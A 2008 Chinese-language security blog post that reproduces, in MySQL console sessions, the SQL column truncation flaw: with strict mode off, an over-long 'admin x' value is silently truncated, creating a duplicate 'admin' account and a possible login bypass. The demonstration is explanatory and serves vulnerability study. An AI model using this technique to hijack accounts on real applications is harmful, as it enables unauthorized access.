Secur1ty just lik3 a girl. B0th of th3m h4ve s0me h0les. Y0u alw4ys try to t0uch the h0le, but n0t 3very tim3 y0u c4n 3xpl0it it!
查看文章 |
关于MySQL的SQL Column Truncation Vulnerabilities
2008-08-19 14:16
Stefan Esser今天写了篇很棒的文章,提到了关于MySQL里的两个缺陷 http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities 1. max_packet_size 的问题 2. SQL Column Truncation 攻击 我测试了第二个。 按照paper里描述的,当mysql的 sql_mode设置为default的时候,即没有开启STRICT_ALL_TABLES选项时,MySQL对于插入超长的值只会提示warning,而不是error(如果是error就插入不成功),这样可能会导致一些截断问题。 这个问题属于mysql的一个功能,在官方文档中也有所描述,然后我们最喜欢的就是这些功能,不是吗? 测试过程如下(MySQL 5): 首先是开启了strict选项: sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" 结果如下: mysql> create table `truncated_test` ( -> `id` int(11) NOT NULL auto_increment, -> `username` varchar(10) default NULL, -> `password` varchar(10) default NULL, -> PRIMARY KEY (`id`) -> )DEFAULT CHARSET=utf8; Query OK, 0 rows affected (0.08 sec) mysql> select * from truncated_test; Empty set (0.00 sec) mysql> show columns from truncated_test; +----------+-------------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +----------+-------------+------+-----+---------+----------------+ | id | int(11) | NO | PRI | NULL | auto_increment | | username | varchar(10) | YES | | NULL | | | password | varchar(10) | YES | | NULL | | +----------+-------------+------+-----+---------+----------------+ 3 rows in set (0.00 sec) mysql> insert into truncated_test(`username`,`password`) values("admin","pass"); Query OK, 1 row affected (0.03 sec) mysql> select * from truncated_test; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | admin | pass | +----+----------+----------+ 1 row in set (0.00 sec) mysql> insert into truncated_test(`username`,`password`) values("admin x", "new_pass"); ERROR 1406 (22001): Data too long for column 'username' at row 1 mysql> select * from truncated_test; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | admin | pass | +----+----------+----------+ 1 row in set (0.00 sec) 然后是关闭了strict选项 sql-mode="NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" mysql> select * from truncated_test; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | admin | pass | +----+----------+----------+ 1 row in set (0.00 sec) mysql> insert into truncated_test(`username`,`password`) values("admin x", -> "new_pass"); Query OK, 1 row affected, 1 warning (0.01 sec) mysql> select * from truncated_test; +----+------------+----------+ | id | username | password | +----+------------+----------+ | 1 | admin | pass | | 2 | admin | new_pass | +----+------------+----------+ 2 rows in set (0.00 sec) mysql> 可见插入成功。出现了两个admin的记录。 那么设想类似如下语句 $userdata = null; 两次查询的先后问题,可能就会导致一次bypass漏洞。 当然在真实环境里没这么简单,可能在应用层面上还会有一些长度检查,往往会使这种攻击失败。但这种攻击可以实施的地方也不仅仅是登录处,还有更广泛的应用空间。 |
最近读者: